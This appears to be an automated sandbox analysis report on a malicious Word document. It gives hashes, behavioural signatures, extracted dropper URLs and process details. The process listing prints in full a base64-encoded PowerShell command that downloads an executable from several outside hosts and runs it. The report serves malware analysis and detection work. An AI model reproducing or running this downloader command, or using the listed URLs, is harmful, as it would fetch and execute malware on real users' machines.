Analysis

  • max time kernel
    139s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 00:29

General

  • Target

    62250326cb08b17e78ca1ae8481e8bcaJaffaCakes118.doc

  • Size

    265KB

  • MD5

    62250326cb08b17e78ca1ae8481e8bca

  • SHA1

    601c203fc3f32264800cfd920bf00d0626e417d2

  • SHA256

    72a6405f7d902fa9cdec66709f35bfeeccc894e541329b8b7710c0a1caa6fa6c

  • SHA512

    1f4659f1733fd7d4accb27a0cf7d8d0ef9638a2b277a214af220cde8811671d1de52391b64bc535acdc559dae4004204b00cbd247c150d35b6df3b1d274dba9f

  • SSDEEP

    3072:5OzPM83524CCyCyMmq5YZF8yDtAKPzjL/xSu90OoiLuDKZXfwKeljR1k:sb25CFk8stRbxUOmD+XfwLg

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://localfreelancersng.com/JJ5na9IyL

exe.dropper

http://pobedastaff.ru/6iYWKl5I_MG

exe.dropper

http://wellbeinghomecareservices.co.uk/A9Y90usX88aRT

exe.dropper

http://vkckd.kultkam.ru/QUxQZUG_9i

exe.dropper

http://beautyandbrainsmagazine.site/cfmGNuDVbnc50bks

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\62250326cb08b17e78ca1ae8481e8bcaJaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4668
    • C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLL.exe
      PoWersheLL -e JABrAGkAbQA0AHEAegBpAHcAPQAoACcAUwB3AFQARQA2AEUAJwArACcAbAAnACkAOwAkAHoAawBtAEsAaQBXAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAOQBCADIAUwB0AD0AKAAnAGgAdAB0AHAAOgAvAC8AJwArACcAbABvACcAKwAnAGMAYQBsAGYAJwArACcAcgBlAGUAJwArACcAbABhAG4AYwAnACsAJwBlAHIAJwArACcAcwBuAGcALgBjACcAKwAnAG8AbQAvAEoASgA1AG4AYQA5ACcAKwAnAEkAeQBMAEAAJwArACcAaAAnACsAJwB0AHQAcAA6AC8AJwArACcALwBwAG8AYgAnACsAJwBlACcAKwAnAGQAJwArACcAYQBzAHQAYQAnACsAJwBmACcAKwAnAGYALgByAHUALwA2AGkAWQAnACsAJwBXAEsAJwArACcAbAA1AEkAXwBNACcAKwAnAEcAQAAnACsAJwBoAHQAJwArACcAdAAnACsAJwBwADoALwAnACsAJwAvAHcAZQAnACsAJwBsAGwAYgBlAGkAJwArACcAbgAnACsAJwBnAGgAJwArACcAbwAnACsAJwBtAGUAYwBhAHIAZQBzAGUAcgB2AGkAYwBlAHMAJwArACcALgBjAG8ALgAnACsAJwB1ACcAKwAnAGsALwBBACcAKwAnADkAJwArACcAWQA5ADAAJwArACcAdQBzACcAKwAnAFgAOAAnACsAJwA4AGEAJwArACcAUgBUACcAKwAnAEAAaAB0AHQAcAA6AC8ALwB2AGsAJwArACcAYwBrAGQAJwArACcALgBrAHUAJwArACcAbAB0AGsAYQBtAC4AcgB1ACcAKwAnAC8AUQBVACcAKwAnAHgAUQBaAFUARwBfADkAaQBAACcAKwAnAGgAdAB0ACcAKwAnAHAAOgAvACcAKwAnAC8AYgBlAGEAJwArACcAdQB0AHkAYQAnACsAJwBuAGQAJwArACcAYgAnACsAJwByAGEAaQBuAHMAJwArACcAbQAnACsAJwBhAGcAJwArACcAYQB6AGkAbgBlAC4AcwBpAHQAJwArACcAZQAnACsAJwAvAGMAZgBtAEcATgAnACsAJwB1ACcAKwAnAEQAVgBiAG4AYwAnACsAJwA1ADAAYgBrAHMAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAbwBUAGoAdwA1AG8APQAoACcAVABIACcAKwAnADkAegBVAEoAWAAnACkAOwAkAHcAOABYAFEASwBKADkAIAA9ACAAKAAnADMAJwArACcANgAwACcAKQA7ACQARwBhAGMARgBDAG0ASwByAD0AKAAnAHQAYwBMACcAKwAnAGoARwBzACcAKwAnAE0AJwApADsAJABHAFMAawB6AGkAdAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcACcAKwAkAHcAOABYAFEASwBKADkAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJAB6AFQASQBFAEMARQAgAGkAbgAgACQAYQA5AEIAMgBTAHQAKQB7AHQAcgB5AHsAJAB6AGsAbQBLAGkAVwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB6AFQASQBFAEMARQAsACAAJABHAFMAawB6AGkAdAApADsAJABuAHIAUAB6AGkASAA9ACgAJwBvAEIAJwArACcAcAA3ACcAKwAnAHMAWQBMAGQAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARwBTAGsAegBpAHQAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABHAFMAawB6AGkAdAA7ACQAagBRADcAbQBNAEcAUABjAD0AKAAnAFYAcQBsADcAQQAnACsAJwBPAHUAJwArACcATAAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAegA4AFgAcwBYAHEAMwA9ACgAJwBDADAAJwArACcARgAnACsAJwBpADYAagAnACkAOwA=
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1880

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDD5CB.tmp\gb.xsl

    Filesize

    262KB

    MD5

    51d32ee5bc7ab811041f799652d26e04

    SHA1

    412193006aa3ef19e0a57e16acf86b830993024a

    SHA256

    6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

    SHA512

    5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x3pi5tgg.kve.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1880-47-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/1880-76-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/1880-57-0x00000157FC9A0000-0x00000157FC9C2000-memory.dmp

    Filesize

    136KB

  • memory/4668-18-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-44-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-0-0x00007FFA23AB0000-0x00007FFA23AC0000-memory.dmp

    Filesize

    64KB

  • memory/4668-10-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-9-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-8-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-11-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-12-0x00007FFA21920000-0x00007FFA21930000-memory.dmp

    Filesize

    64KB

  • memory/4668-13-0x00007FFA21920000-0x00007FFA21930000-memory.dmp

    Filesize

    64KB

  • memory/4668-15-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-14-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-17-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-19-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-21-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-22-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-23-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-20-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-3-0x00007FFA23AB0000-0x00007FFA23AC0000-memory.dmp

    Filesize

    64KB

  • memory/4668-16-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-40-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-41-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-1-0x00007FFA63ACD000-0x00007FFA63ACE000-memory.dmp

    Filesize

    4KB

  • memory/4668-46-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-2-0x00007FFA23AB0000-0x00007FFA23AC0000-memory.dmp

    Filesize

    64KB

  • memory/4668-7-0x00007FFA23AB0000-0x00007FFA23AC0000-memory.dmp

    Filesize

    64KB

  • memory/4668-4-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-61-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-65-0x00007FFA63ACD000-0x00007FFA63ACE000-memory.dmp

    Filesize

    4KB

  • memory/4668-66-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-69-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-70-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-71-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-72-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-73-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-6-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB

  • memory/4668-5-0x00007FFA23AB0000-0x00007FFA23AC0000-memory.dmp

    Filesize

    64KB

  • memory/4668-577-0x00007FFA23AB0000-0x00007FFA23AC0000-memory.dmp

    Filesize

    64KB

  • memory/4668-578-0x00007FFA23AB0000-0x00007FFA23AC0000-memory.dmp

    Filesize

    64KB

  • memory/4668-576-0x00007FFA23AB0000-0x00007FFA23AC0000-memory.dmp

    Filesize

    64KB

  • memory/4668-579-0x00007FFA23AB0000-0x00007FFA23AC0000-memory.dmp

    Filesize

    64KB

  • memory/4668-580-0x00007FFA63A30000-0x00007FFA63C25000-memory.dmp

    Filesize

    2.0MB